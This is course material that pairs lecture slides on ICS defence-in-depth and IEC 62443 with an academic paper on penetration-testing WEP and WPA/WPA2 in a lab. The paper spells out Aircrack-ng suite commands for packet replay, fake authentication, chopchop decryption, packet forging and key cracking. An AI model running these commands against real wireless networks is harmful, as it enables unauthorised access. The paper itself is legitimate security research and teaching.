homed to span both the control and corporate networks
• All connections between the control network and the corporate

network should be through a firewall.
27
Defence-in-depth
• Multiple layer strategy involving two (or more) different overlapping

security mechanisms
• A defense-in-depth architecture strategy includes the use of firewalls,

the creation of demilitarised zones, intrusion detection capabilities
along with effective security policies, training programs, incident
response mechanisms and physical security.
• Also requires thorough understanding of possible attack vectors on an

ICS.
28
Defence-in-depth
29
ISA/IEC 62443
• ISA and IEC have developed the IEC 62443 series of standards to
address the need to design cybersecurity robustness and resilience
into industrial automation control systems (IACS)
• Provides the detailed information to implement a cyber-security

program.
• https://www.isa.org/training-and-certifications/isa-certification/
isa99iec-62443/isa99iec-62443-cybersecurity-certificate-programs/?
utm_medium=social&utm_campaign=smm-training-ISA-IEC-62443-
Cybersecurity-Certificate-Programs&utm_source=twitter
30
ISA/IEC 62443
31
ISA/IEC 62443-3-2: Security Risk Assessment and

System Design
• Includes the zone and conduit requirements (network segmentation

and aggregation)
• You can find it in the reading list. alternatively you can download it
from UWE’s Library online webpage.
32
In the tutorial…
• NIST 800-82, Section 5.2 Boundary Protection

• Sans 401 Network Model
• Design defence-in-depth for an ICS.

• Attack Vectors,
• Attack Trees,
• Kill Chain
33
References
Chapter 5 from: https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/

final
IEC/ISA 62443-3-2
34
See discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/342283555
Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux

Hacking Tools
Article in International Journal of Computer Applications · June 2020

DOI: 10.5120/ijca2020920365
CITATIONS READS
18 8,203
2 authors:
Michael Kyei Kissi Michael Asante

University of Media, Arts and Communication (UniMAC) Kwame Nkrumah University Of Science and Technology
2 PUBLICATIONS 18 CITATIONS 77 PUBLICATIONS 203 CITATIONS
SEE PROFILE SEE PROFILE
All content following this page was uploaded by Michael Kyei Kissi on 10 July 2020.
The user has requested enhancement of the downloaded file.

International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020
Penetration Testing of IEEE 802.11 Encryption Protocols

using Kali Linux Hacking Tools
Michael Kyei Kissi Michael Asante, PhD

Department of Computer Science Department of Computer Science
Kwame Nkrumah University of Science and Kwame Nkrumah University of Science and
Technology Technology
Kumasi, Ghana Kumasi, Ghana
ABSTRACT standards. The 802 handles the Local and Metropolitan Area
The use of wireless network as a medium of communication Network (MAN) whilst the suffix .11 handles the WLAN [3].
has tremendously increased due to its flexibility, mobility and The 802.11 is governed by set of rules or protocols to aid
easy accessibility. Its usage is inevitable at hotels and propagation of wireless signals and communication across the
restaurants, airports, organizations and currently predominant wireless network. The 802.11 employs the Carrier Sense
in homes. As large number of devices connect to wireless Multiple Access (CSMA) and the Medium Access Control
network, valuable and sensitive information are shared among (MAC) protocol with Collision Avoidance (CA). There are
users in the open air, attackers can easily sniff and capture versions of the standard which can be recognized by one or
data packets. This paper aims at using penetration testing to two ending alphabetic characters, these are 802.11a, 802.11b,
assess vulnerabilities and conduct attacks on Wireless 802.11g, 802.11n and 802.11ac [8]. The most common and
Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) widely used among the standard are the 802.11a, 802.11b and
and 802.11i (WPA2) security protocols. The penetration 802.11g [7].
testing was conducted using Kali Linux with its Aircrack-ng
tools.
2.1 Attacks on WLAN
WLAN uses Radio Frequency (RF) or Infrared Transmission
Keywords Technology for connectivity among devices making it
IEEE, 802.11, WEP, WPA, WPA2, Kali Linux, Aircrack-ng, susceptible to attacks. Attacks on wireless network aims at
WLAN, Wireless, Penetration Testing, Encryption, Security. breaching the integrity and confidentiality of the network
availability and needed information. These attacks are
1. INTRODUCTION categorized into Passive and Active Attacks.
Wireless Network in today’s communication technology is Passive attack: Network traffics are silently eavesdropped or
tremendously increasing due to the benefits it provides such monitored by an attacker and waits until a client seeks to
as flexibility, mobility and easier accessibility. Most hotels connect with the Access Point (AP) or searches for the
and restaurants, coffee shops, airports, organizations and network Service Set Identifier (SSID) as a result the attacker
institutions currently provide open or secured wireless obtains the SSID in plaintext. An attacker can intercept data
connectivity. Nevertheless, wireless network can also be seen transmitted through the network such as Traffic Analysis,
in homes [1]. The IEEE 802.11 Wireless Local Area Network Packet Sniffing, War-Driving and Port Scanning. These types
(WLAN) has evolved to be the easiest and known network of attacks are usually difficult to detect since the attacker does
technology to setup since its inception. Its popularity is as not modify the content or information [9].
result of the use of a Local Area Network (LAN), less
expensive, easy setup installation and configuration Active attack: The attacker does not only gain access to
procedures [2]. The availability of WLAN menaces the information but can make changes to the network information
security of the Network Infrastructure causing challenges for and even inject fraudulent packets to the network. An attacker
Network Administrators as well as the organization. WLAN can initiate commands to disrupt the usual operations of the
signal travels beyond the boundaries of a specified area as network such as Denial of Service (DoS), Session Hijacking,
compared to wired network [3]. [4] noted that the use of the Brute force Attack, Reply Attack, and Man in the Middle
wireless medium is shared among its users in the open air; (MITM) attack [9] [10].
attackers can easily sniff and capture data packets. WLAN
may suffer attacks and damages such as system comprised, 2.2 WLAN Security
data theft, Denial of Service (DoS) and among others [5]. This The WLAN protocols outlined by the IEEE comprise of three
study presents a security assessment of WLAN using security standards, these are Wired Equivalent Privacy
penetration testing tools to examine and exploit identified (WEP), Wi-Fi Protected Access (WPA) and Wi-Fi Protected
vulnerabilities in WLAN security protocols. Penetration Access 2 (WPA2) [11]. [12] stated that WLAN security
testing framework used for the testing was based on the protocols were designed to protect the network from several
National Institute of Standards and Technology (NIST) [6]. breaches due to susceptibility of the Wi-Fi transmission
The framework involves four phases namely; Planning Phase, signals which has no limited boundaries, hence, they are
Discovery Phase, Attack Phase and Reporting Phase. prone to illegitimate access. According to [13] a secured
WLAN must have five key requirements, namely;
2. LITERATURE REVIEW Authentication, Access Control, Confidentiality, Non-
The IEEE 802.11 gives a criterion for WLAN Repudiation and Data Integrity. In spite of this WLAN
communications among devices [7]. The IEEE in 1997 security are prone to threats such as Eavesdropping and traffic
developed the 802.11 standard which is a subset of the 802 analysis, Denial of Service, Masquerade, forged packets and
26
among others. 2.3.1.3 No Mutual Authentication

WEP authentication is client-centered or one-way
2.3 Wired Equivalent Privacy (WEP) authentication. The client cannot prove its identity to the AP,
The IEEE 802.11 developed WEP in 1999 to endow security only the AP authenticates the client since the WEP Key is
for wireless network as compared to the wired [3]. The WEP configured on the AP [19].
encryption is based on RC4 symmetric stream cipher with 40-
bit and 104-bit encryption keys [7]. WEP involves two
parameters, an Initialization Vector (IV) which is a three (3)
2.3.1.4 Forged Authentication Messages
An attacker eavesdrops and monitors packets transmitted in
byte value and shared WEP Key of hexadecimal digits for
order to uncover the RC4 stream cipher used for encryption
encryption and decryption. WEP appends a 32-bit Cyclic
[20]. The stream obtained is used to encrypt any challenge
Redundancy Check (CRC) checksum to each transmitted data
received since an attacker can forge a valid authentication
frame. The 24-bit IV which is randomly selected together with
packet out of the keystream.
the secret key sent to the RC4 to produce a keystream. The
plaintext is XORed with the RC4 keystream to create a cipher 2.3.2 Attacks on WEP
text as illustrated in figure 1.
2.3.2.1 Chopchop Attack
The Chopchop attack decrypts the entire WEP packet without
knowing the WEP Key. An attacker decrypts the last n bytes
of plaintext of encrypted packet by sending an average of
n*128 packets on the network [21]. The Chopchop attack
exploit the vulnerability of the 4-byte checksum used for the
integrity of the encrypted packets [22].
2.3.2.2 Fluhrer, Mantin and Shamir (FMS) Attack

Figure 1: WEP Data Frame Encryption [14] The FMS attack is a statistical attack discovered by Fluhrer,
[15], WEP decrypts received data frames by regenerating the Mantin and Shamir. The attack is as a result of the use of
keystream using the RC4 (IV and shared key) and then weak Initialization vectors (IV’s) in RC4 algorithm [23]. [24]
XORed with the cipher text to retrieve the plaintext. A new describes the “weak” IVs of having a structure of B+3::ff:X
checksum is computed and compared with the received (where B is the byte of key, ff being constant value of 255,
checksum. The plaintext is obtained if the two checksums are and X is irrelevant). The attacker can determine the value of B
equal as shown in figure 2. by using the information of the plaintext found in the headers
of certain packets, like the Address Resolution Protocols
(ARPs) [25].
2.3.2.3 ARP Replay Attack

IVs are freely reused and has no sequence number to validate
replayed packets, this gives room for an attacker to generate
more packets from the captured packets [26]. ARP Request
packets are easily identified based on the destination MAC
Figure 2: WEP Data Frame Decryption [14] address and fixed size. The attacker sniffs ARP Request
packets from a legitimate host and keeps replaying that ARP
2.3.1 Weakness and Vulnerabilities in WEP Request and the host response with ARP Reponses and
WEP uses RC4 algorithm and secret key to provide access therefore more traffic is generated. When enough data packets
control and confidentiality, and the CRC checksum for data with weak IVs are collected, the WEP Key is easily cracked
integrity [15]. With these security control mechanisms, WEP within a short period.
security protocol has vulnerabilities and can be exploited by
attackers. 2.4 Wi-Fi Protected Access (WPA)
Wi-Fi Alliance created WPA in 2003 to improve the existence
2.3.1.1 Short IV Size and Keystream Reuse of vulnerabilities and flaws in WEP [20]. WPA improves data
The IV has a size of 24 bits processing 16,777, 216 different encryption using a hashing algorithm called Temporal Key
RC4 cipher streams for a given WEP key and transmitted in Integrity Protocol (TKIP) which scramble the keys and adds
clear text for each packet [16]. IV is used to alter the an integrity check feature to prevent tampering of the
keystream, when the IV value changes so do the keystream. encrypted keys [20]. TKIP uses the RC4 encryption algorithm
When more traffics are sent, unique IVs cannot be generated same as WEP but uses hash value to determine the uniquely
after transmitting 224 packets, hence, there is a possibility of generated temporal key for each packet traversed. TKIP make
IVs repeating (reuse) because the 24-bits space will be use of Message Integrity Code (MIC) for integrity check
exhausted. instead of the ICV used with WEP. This prevents attackers
from injecting data into a packet to find the keystream used to
2.3.1.2 Integrity Check Value (ICV) Insecurity encrypt the data [27]. It also uses sequence counters to
The availability of the ICV or CRC checksum is to safeguard prevent replay attacks which improves integrity check.
packets in transit, preventing attackers from altering the
packets [17]. The CRC is a linear function which means an 2.5 Wi-Fi Protected Access 2 (WPA 2)
attacker can modify encrypted messages and fix the ICV to Wi-Fi Alliance improved WPA in 2004 by designing the
obtain a genuine message. An attacker with a valid keystream 802.11i (WPA2) which uses the concept of Robust Security
can create arbitrary messages, compute the checksum and Network (RSN) [20] [10]. It tackles three key security areas
encrypt it using the keystream since WEP allows IV reuse namely; Data Transfer Privacy, Authentication and Key
[18]. Management [28]. WPA2 uses Advanced Encryption
Standard (AES) called Counter Mode Cipher Block Chaining
27
- Message Authentication Code (CBC-MAC) protocol 3. Authenticator to Supplicant

(CCMP) for data encryption [29] [30]. CCMP was created as The PMK is used to decrypt it and acquires the SNonce and
part of the 802.11 security for the 802.11i (WPA2) to replace MIC when the AP receives the second message. The AP uses
WEP and TKIP [10]. The AES uses the Rijindael algorithm the received MIC to check for data integrity. The AP also
consisting of a block cipher using 128-bit, 192-bit or 256-bit derives its PTK using the same inputs and installs if the MIC
key. AES permits the use of a single encryption key to all value is valid.
packets, which removes the challenges associated with key
scheduling and key distribution related to WEP and TKIP 4. Supplicant to Authenticator
protocols [31]. Both supplicant and AP check whether the PTKs are equal by
decrypting the third message. The supplicant installs the PTK
2.5.1 WPA/WPA2-PSK Four-Way Handshake for encrypted unicast transmission and Group Transient Key
WPA/WPA2 uses dynamic keys generated from per-packet to (GTK) for broad or multicast transmission.
generate the Pairwise Master Key (PMK). According to [32],
the four-way handshake provides mutual authentication based
on the PMK, and agrees on a fresh session key known as the
Pairwise Transient Key (PTK). The four-way handshake
contains four packets (messages) exchange that occurs
between the client (Supplicant) and the AP (Authenticator).
The PMK is generated by using the hashing algorithm
PBKDF2 which requires inputs:
PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
Where:
Passphrase: The passphrase (8 to 63 characters)
SSID: the SSID of the Authenticator (AP)
Figure 3: Generation of WPA/WPA2 Four-way
SSIDlen: the length of the SSID
Handshake [33]
4096: Number of hashing iterations (through SHA1
algorithm) 2.5.2 Weakness and Vulnerabilities in
WPA/WPA2
256: Intended Key Length of the PSK All values needed to compute the PTK from the PMK are
PTK which is a dynamic key is used to produce the four-way transmitted unencrypted in the four-way handshake. The PTK
handshake during authentication. The PMK and two Nonces is a temporary key used in order not to broadcast the PMK
are used to create the PTK when connection happens [33]. and relevant information from the four-way handshake. The
weakness in WPA-PSK is as a result of the PMK [14]. The
PTK = Function (PMK, Authenticator Nonce (ANonce), PMK is derived by using the hashing algorithm PBKDF2
Supplicant Nonce (SNonce), Authenticator MAC, Supplicant (Passphrase, SSID, SSIDlen, 4096, 256). The attacker uses the
MAC) PBKDF2 algorithm by inserting the SSID, own generated
Where, passphrase and SSID length to compute a hashed key and
compares it with the captured hashed key. The attacker
PMK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256) succeeds if the two hash values matches, hence, the valid
passphrase is obtained. Information such as Client and AP
PTK = Function ((Passphrase, SSID, ssidLen, 4096, 256),
MAC addresses, ANonce, SNonce and MIC value are
ANonce, SNonce, Authenticator MAC, Supplicant MAC)
transmitted in clear text together with the PMK are used to
Messages exchanged in the four-way handshake are defined generate the PTK. An attacker can use brute force techniques
by using Extensible Authentication Protocol over LAN and dictionary attack to discover or crack the WPA Key [10]
(EAPOL) frames. The EAPOL-Key contain in the four-way [14] [35]. If the password exists in the attacker dictionary or
handshake is used for the purpose of key exchange and wordlist, the WPA key will be successfully cracked.
negotiation [34]. The four-way handshake between the
supplicant and authenticator starts after the generation of the 2.5.3 Attack on WPA/WPA2
PMK. Figure 3 shows an illustration of the generation of four- WPA/WPA2 is vulnerable to attacks against the four-way
way handshake and installation of the PTK handshake and encryption protocol [36]. PTK generation is
based on the PMK, Authenticator MAC, Supplicant MAC and
1. Authenticator to Supplicant Nonces. With the exception of the PMK, the other parameters
Authenticator (AP) generates a long arbitrary value called are transmitted in plaintext throughout the four-way
Authenticator Nonce (ANonce) then encrypt it using the PMK handshake. The only unknown value to the attacker in
(unknown to the supplicant) for the generation of PTK at the computing the PMK is the passphrase (PSK) which can be
supplicant station. guessed correctly by the attacker carrying out a dictionary
attack with a valid four-way handshake captured. The
2. Supplicant to Authenticator
passphrase will be known to the attacker if it exists in the
The supplicant replies the received message to the
dictionary or wordlist [14] [37].
authenticator by generating its own long random value called
Supplicant Nonce (SNonce). The ANonce, SNonce and PMK 3. METHODOLOGY
are used to generate the PTK by the supplicant. MIC is The chosen environment for performing the assessment and
generated using cryptographic hash (HMAC-SHA1) for penetration testing was to set up a WLAN infrastructure as an
integrity check of the key installed on the supplicant side. experimental network laboratory. The study considered to use
28
the network laboratory in order not compromise any

individual or organization network due to privacy and legality
of user information.
3.1 Laboratory Experiment Setup and

Requirements
The experiment required the use of an Authenticator (wireless
router), an external wireless adapter and two laptops (one as
the PenTester PC and other as the supplicant, the supplicant Figure 6: Detection of ARP Request Packets
could be any device with wireless connectivity). Figure 4 The attacker uses the MAC address of the client
illustrate the connections of the used devices. (AC:36:13:6C:6F:4A) in order not to be rejected by the AP to
repeatedly reply the received ARP Request packets and
receive ARP Responses generating more packets with weak
IVs using the command “aireplay-ng --arpreplay -e
SecurityTest -h AC:36:13:6C:6F:4A wlan0mon”.
The attacker successfully generates more packets (70593) as
shown in figure 7.
Figure 4: Setup for Penetration Testing
3.2 Exploiting Vulnerabilities in IEEE

802.11 WEP Security Protocol Figure 7: Successful Generation of ARP Packets by
Three vulnerabilities were discovered and exploited in the Attacker
IEEE 802.11 WEP security protocol through the penetration
testing conducted. 3.2.2 No Mutual Authentication makes it
Vulnerable to Fake Authentication Attack
3.2.1 No Replay Protection Mechanism in WEP A fake authentication was conducted and the attacker was
The packets were repeatedly replayed into the network to successfully associated with the AP as a result of no mutual
generate more packets with weak IVs. The IVs are weak authentication. The follow indicates the experiment steps:
because the IV space is short and easily get exhausted
resulting in reuse of the IVs. The following steps indicates Attacker uses the command “aireplay-ng --fakeauth 0 -a
how the vulnerability was exploited. 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon” to
conducts a fake authentication using its MAC address
The command, “airodump-ng wlan0mon” was used to (00:C0:CA:83:01:CD) and the AP MAC address
discover the wireless network, sniff and capture data packet. (98:FC:11:EE:41:25) since the AP only authenticates its
The wlan0mon is the monitor mode interface of the wireless clients. Figure 8 shows how authentication request and
card which has a MAC address of 98:FC:11:EE:41:25 association request were successfully acknowledged by the
(targeted AP). Sniffed and captured data packets were saved AP. This means that the attacker got connected to the AP.
to a file called arp-test using the command “airodump-ng --
channel 6 --bssid 98:FC:11:EE:41:25 --write arp-test
wlan0mon” as shown in figure 5.
Figure 5: Capture of Data Packets on Targeted Access

Point
The command “aireplay-ng --arpreplay -e SecurityTest Figure 8: Successful Fake Authentication and Association
wlan0mon” was used to detect ARP Request packets to be with Target AP by Attacker
replayed for the AP to send ARP Response packets to enable
the attacker generate more packets. Figure 6 shows that data 3.2.3 WEP is Vulnerable to Message Modification
packets (59 packets) were received but no ARP Request and Injection Due to ICV Insecurity
packet was detected as a result of the attacker’s MAC address The WEP security protocol could not detect modified packets
(00:C0:CA:83:01:CD). or differentiate between the original and forged packets. The
following steps indicates the existence of the vulnerability:
Attacker uses the command “aireplay-ng --chopchop - a
98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon” to
decrypt the captured encrypted data packets to obtain the
keystream (replay_dec-0713-213506.xor) and plaintext
(replay_dec-0713-213506.cap) as shown in figure 9.
29

802.11 WPA/WPA2-PSK Encryption
Protocol
Three vulnerabilities associated with the security protocol
were discovered as follows:
1. Four-way handshake is transmitted unencrypted
(plaintext).
Figure 9: Capture of Keystream and Plaintext files 2. Message Integrity Check (MIC) is unencrypted
(plaintext).
Attacker modified or forged new packets out of the keystream
and compute the checksum using the command “packetforge- 3. Derivation Formulae for Computing PMK and PTK are
ng -0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD -k known to the Attacker.
255.255.255.255 -l 255.255.255.255 -y replay_dec-0713-
213506.xor -w packetforge-test” and saves the packets to a Attacker requires the capture of a valid four-way handshake
file called packetforget-test. (contains the MIC and inputs to derived the PMK and PTK)
and a wordlist to conduct a dictionary attack to crack the PSK
The command “aireplay-ng -2 -r packetforge-test wlan0mon”, (passphrase) which is unknown to the attacker.
was used to inject the forged packets into the AP or traffic to
generate data packets with new IVs as shown in figure 10. Figure 12 shows a successful capture of the four-way
These generated packets help to speed up the cracking process handshake and saved to file called wpa-handshake using the
of the WEP Key. command “airodump-ng --channel 6 --bssid
98:FC:11:EE:41:25 --write wpa-handshake wlan0mon”.
Figure 12: Successful Capture of WPA Handshake
3.3.1 Cracking of WPA/WPA2-PSK Passphrase

With the captured WPA Handshake and wordlist or dictionary
of passwords, aircrack-ng was used to crack the WPA
Figure 10: Generation of New IVs from Forged Packets
Passphrase using the command “aircrack-ng wpa-handshake-
3.2.4 Cracking of IEEE 802.11 WEP Encryption 01.cap -w passwords”. The passphrase or WPA Key was
successfully cracked as shown in figure 13.
Protocol Key
“Aircrack-ng” tool was run parallel as more packets with
weak IVs were generated. With 51326 IVs, 698 possible keys
were tested and the WEP key was successfully cracked as
shown in figure 11.
Figure 13: WPA- PSK Key (Passphrase) Successfully

Cracked
4. RESULTS ANALYSIS
Vulnerabilities discovered enabled a successful crack of the
wireless security protocols.
Figure 11: WEP Key Successfully Cracked
30
4.1 Analysis on Vulnerabilities in IEEE

802.11 WEP Encryption Protocol
4.1.1 No Replay Protection Mechanism in WEP
Packets (70593) were successfully captured and repeatedly
replayed into the network to generate more packet with weak
IVs which aided in the cracking of the WEP Key. ARP
packets (18112) that were used for the replay attack were Figure 17: Saved Plaintext and Keystream files
successfully captured and injected into network to generate
packets as shown in figure 14. 4.1.4 Cracking of IEEE 802.11 WEP Encryption
Protocol Key
WEP was based on confidentiality, not authorization that uses
RC4 stream cipher and CRC-32 checksum as integrity to
encrypt WEP Key. WEP is vulnerable to attacks due to the
implementation of IV mechanism. The 24-bit IV space gets
exhausted within few hours and these IVs are duplicated. The
Chopchop attack was used to crack the WEP Secret Key. The
Chopchop attack method developed by KoreK, exploits
Figure 14: ARP Packets Generated by Attacker vulnerability in WEP security protocol itself rather than the
4.1.2 No Mutual Authentication makes it weakness in the RC4 algorithm. Without knowing the secret
key, the attacker was able to capture and decrypt encrypted
Vulnerable to Fake Authentication Attack packets to obtain the keystream and plaintext. The keystream
The attacker successfully performed a Fake Authentication and plaintext are XORed to produce a fake cipher text which
and got associated with the AP gaining access to network is injected into the network to generate more packets with
resources. Figure 15 shows an acknowledgement of a weak IVs. The IVs are transmitted in clear text concatenated
successful Authentication and Association by the AP as with the secret shared Key. As weaker IVs are generated it
highlighted. increases the success of cracking the WEP key. With 51326
weak IVs generated, the WEP Key was successfully cracked
as shown in figure 18.
The outcome of the result shows that WEP is vulnerable to
attacks. The WEP key can be cracked without any active
client connected to the network. Also without knowing the
Figure 15: Successful fake Authentication and Association WEP key, the plaintext and the keystream can be obtained
with Target AP by Attacker which is used to crack the key successfully.
The attacker MAC Address (00:C0:CA:83:01:CD) was
indicated in the discovered list of clients that are connected to
the AP with MAC Address (98:FC:11:EE:41:25) as shown in
figure 16.
Figure 16: Attacker Connects to Access Point
4.1.3 WEP is Vulnerable to Message Modification

and Injection Due to ICV Insecurity
Using the “chopchop” attack method, the attacker was able to Figure 18: WEP Key Successfully cracked
decrypt encrypted packets without knowing the secret key.
The attacker chops away the last byte of the captured 4.2 Analysis on Vulnerabilities in IEEE
encrypted packet and substitutes the value of the last byte, 802.11 WPA/WPA2-PSK Encryption
recalculates the encryption checksum and injects the modified
packet into the network, if the AP accepts the modified Protocol
packets means the attacker’s guess was correct else the packet WPA/WPA2-PSK is vulnerable to attacks as a result of the
is rejected by the AP. An invalid packet is as a result of four-way handshake which is transmitted unencrypted
incorrect ICV which means the attacker computes the (plaintext). All the parameters used to conduct the mutual
checksum to validate the forged or modified packets. The authentication (PMK and PTK generation) between the
decrypted packet contains the keystream (replay_dec-0713- supplicant and authenticator (AP) are known to an attacker
213506.xor) file and plaintext (replay_dec-0713-213506.cap) except the passphrase. The formulae derivation of the PMK
file as shown in figure 17. The captured keystream is used for and PTK are as follows:
the generation of forged valid packets to be accepted by the PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
AP.
PTK = Function (PMK, ANonce, SNonce, Authenticator
MAC, Supplicant MAC).
The captured four-way handshake was analyzed with
31
Wireshark. The first message of the EAPOL Handshake was

transmitted from the AP to the Supplicant which comprise of
a random number (256 bits) called ANonce for PTK
generation at the Supplicant. The AP MAC Address and
ANonce were known as highlighted in figure 19.
Figure 21: Successful Crack of WPA/WPA2-PSK

Passphrase
5. CONCLUSION
In assessing the security of IEEE 802.11 WLAN Security
protocols using penetration testing, it is proven that WEP and
WPA/WPA2-PSK are vulnerable to attacks. In WEP, the
entire size of the IV space is 24-bit which gets exhausted
within a short time and cause the IVs to repeat itself as more
Figure 19: First Message of the WPA Four-way packets are being generated. Cracking of WEP Key is
Handshake (ANonce and AP MAC Address) dependent on the generating of more weak IVs. Once enough
weak IVs are generated the key will be successfully cracked.
The Supplicant sends the second message as a reply to the
The CRC32 checksum (ICV) aim is to verify data integrity by
first EAPOL Handshake message by sending its SNonce in preventing alter of data packets in transit. The ICV is related
plain text to the Authenticator encrypted by a cryptographic
to the plaintext not to the cipher text. Fake cipher text
hash algorithm (HMAC-SHA1) called the MIC for integrity
generated does not affect the ICV, therefore, the ICV unable
of the installed key on the supplicant side as highlighted in
to achieve its aim. In the case of WPA/WPA2-PSK, the four-
figure 20. An MIC is computed for each PTK by the AP and
way handshake between the client and the AP is easy to be
compared with the captured MIC in the second message of the
captured by an attacker and determine the PMK and PTK
EAPOL Handshake. If they are equal, the attacker derives
since it is dependent on the captured of the four-way
same PTK and the passphrase is cracked.
handshake. WPA/WPA2-PSK will be successfully cracked if
only the passphrase exists in the attacker’s wordlist or
dictionary file since the PMK and PTK can be determined.
6. REFERENCES
[1] Lee P., Stewart D. and Calugar-Pop C., (2014).
Technology, Media & Telecommunications Predictions.
London: Deloitte report, pp. 1-60, 2014.
[2] Waliullah Md., Moniruzzaman A. B. M., and Sadekur
Rahman Md., (2015). An Experimental Study Analysis
of Security Attacks at IEEE 802.11 Wireless Local Area
Network. International Journal of Future Generation
Communication and Networking, vol. 10, no. 4, pp. 9-18.
[3] Ola G., (2013). Penetration Testing on a Wireless
Network Using Backtrack 5. Turku University of
Applied Sciences.
[4] Chen Z., Guo S., Zheng K., and Li H., (2009). Research
on man-in-the-middle denial of service attack in sip
Figure 20: Second Message of the WPA Four-way VoIP," Networks Security, Wireless Communications
Handshake (SNonce, MIC and Client MAC Address) and Trusted Computing, NSWCTC, vol. 2, pp. 263-266,
The Passphrase of the WPA/WPA2-PSK was successfully Apr. 2009.
obtained as shown in figure 21 indicating the PMK, PTK and [5] Appiah, J. K., (2014). Network and Systems Security
the MIC using cryptographic hash algorithm (HMAC-SHA1). Assessment using penetration testing in a university
The outcome of this study implies that WPA/WPA2-PSK is environment: The case of Central University College.
vulnerable to dictionary attack. Attacker can crack Kwame Nkrumah University of Science and Technology,
WPA/WPA2-PSK if the passphrase exists in dictionary or Kumasi.
wordlist. [6] National Institute of Standards and Technology (NIST),
(2008). Technical Guide to Information Security Testing
and Assessment, Special Publication 800-115,
Gaithersburg.
32
[7] Praveen L., Ravi S. Y., and Keshava R. M. (2011). Bio-Inspired Network. Liverpool John Moores
Securing IEEE 802.11g WLAN Using OPENVPN and University.
Its Impact Analysis. International Journal of Network
Security & Its Applications (IJNSA), Vol.3, No.6, [23] Kurup L., Shah V. and Shah D., (2014). Comparative
November 2011. Study of Attacks on Security Protocols. International
Journal of Advanced Research in Computer Engineering
[8] Kropeit T. (2015), Don’t Trust Open Hotspots: Wi-Fi & Technology (IJARCET) Volume 3 Issue 8, August
Hacker Detection and Privacy Protection via 2014
Smartphone. Ruhr-Universitat Bochum.
[24] Fluhrer S., Mantin I. and Shamir A., (2001). Weaknesses
[9] Forouzan B., (2008). Data Communications & in the Key Scheduling Algorithm of RC4. Eighth Annual
Networking. 4th edition. New York: McGraw-Hil Workshop on Selected Areas in Cryptography, August
2001.
[10] L’ubomir Z., (2012). Security of Wi-Fi Networks.
Comenius University, Bratislava [25] Hulin K., Locke C., Mealey P., and Pham A., (2010).
“Analysis of wireless security vulnerabilities, attacks,
[11] Bilger J., Cosand H., Singh N. and Xavier J. (2005). and methods of protection”. Information Security
Security and Legal Implications of Wireless Networks, Semester Project, 2010.
Protocols, and Devices
[26] [Robyns P., (2014). Wireless Network Privacy. Hasselt
[12] Shweta T., Pratim K., Sumedh K, and Aniket G., (2013). University
“Study of Vulnerabilities of Wlan Security Protocols,”
Journal, Dep. Comput. Eng. Fr. C. Rodrigues Inst. [27] Zarch S. H. M., Jalilzadeh F., and Yazdanivaghef M.,
Technol. Vashi, Navi Mumbai, no. September, pp. 109– (2012). Encryption as an Impressive Instrumentation in
112, 2013 Decrease Wireless WAN Vulnerabilities. International
Journal of Scientific and Research Publications, Volume
[13] Memon A. Q., Raza A. H. and Iqbal S., (2010). WLAN 2, Issue 12, December 2012, ISSN 2250-3153
Security. Halmstad University School of Information
Science, Computer and Electrical Engineering. Technical [28] Papaleo, G. (2006). Wireless Network Intrusion
report, IDE1013, April 2010. Detection System: Implementation and Architectural
Issues: Universita degli Studi di Genova.
[14] Kumkar V., Tiwari A., Tiwari P., Gupta A. and Shrawne
S., (2012). Vulnerabilities of Wireless Security protocols [29] Ciampa M. D., (2012). Security+ Guide to Network
(WEP and WPA2). International Journal of Advanced Security Fundamentals. Course Technology, Cengage
Research in Computer Engineering & Technology. Learning.
Volume 1, Issue 2, April 2012
[30] Laverty D., (n.d.). WPA versus 802.11i (WPA2): How
[15] Park T., Wang H., Cho M., Shin K. G., (2002). Enhanced your Choice Affects your Wireless Network Security.
Wired Equivalent Privacy for IEEE 802.11 Wireless http://www.openxtra.co.uk/articles/wpa-vs-80211i.php
LANs: The University of Michigan
[31] Mkubulo D., (2007). Analysis of Wi-Fi Security
[16] Intercop Net Labs, (2002). "What's Wrong with WEP?" Protocols and Authentication Delay. The Florida State
Retrieved from University, FAMU-FSU College of Engineering
http://www.opus1.com/www/whitepapers/whatswrongwi
thwep.pdf (Accessed on May 10, 2018) [32] Vanhoef M., and Piessens F., (2017). Key Reinstallation
Attacks: Forcing Nonce Reuse in WPA2. imec-DistriNet,
[17] Borisov N., Goldberg I., and Wagner D., (2001). KU Leuven
Security of the WEP algorithm Retrieved from
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html [33] Ramachandran, V. (2011), BackTrack 5 Wireless
(Accessed on April 24, 2018) Penetration Testing, Master Bleeding Edge Wireless
Testing Techniques with BackTrack 5: Packt Publishing,
[18] Kiemele L., (2011). Wireless Network Security. Birmingham UK
V00154530
[34] Noh J., Kim J., and Cho S., (2018). Secure
[19] Zahur Y. and Yang T., (2004). “Wireless LAN Security Authentication and Four-Way Handshake Scheme for
and Laboratory Designs”. University of Houston Clear Protected Individual Communication in Public Wi-Fi
Lake CCSC, Journal of Computing Sciences in Colleges, Networks. Digital Object Identifier 10.1109/IEEE
vol. 19, no. 3, January 2004, pp. 44-60. ACCESS.2018.2809614
[20] Bulbul H. I., Batmaz I. and Ozel M., (2008). Wireless [35] Kaplanis C., (2015). Detection and prevention of Man in
Network Security: Comparison of WEP (Wired the Middle attacks in Wi-Fi Technology
Equivalent Privacy) Mechanism, WPA (Wi-Fi Protected
Access) and RSN (Robust Security Network) Security [36] Stimpson T., Liu L., Zhang J., Hill R., Liu W. and Zhan
Protocols. Gazi University Y. (2012). “Assessment of Security and Vulnerability of
Home Wireless Networks”, IEEE 9th International
[21] Gupta S., (2012). Wireless Network Security Protocols- Conference on Fuzzy Systems and Knowledge
A Comparative Study, IJETAE, 2012 Discovery, Chongqing, China, 29-31 May, 2012, pp.
2133-2137.
[22] Alselwi A., (2015). Wireless Security Protocol in DNA
IJCATM : www.ijcaonline.org 33
View publication stats

Critical System Security
UFCF7P-15-M
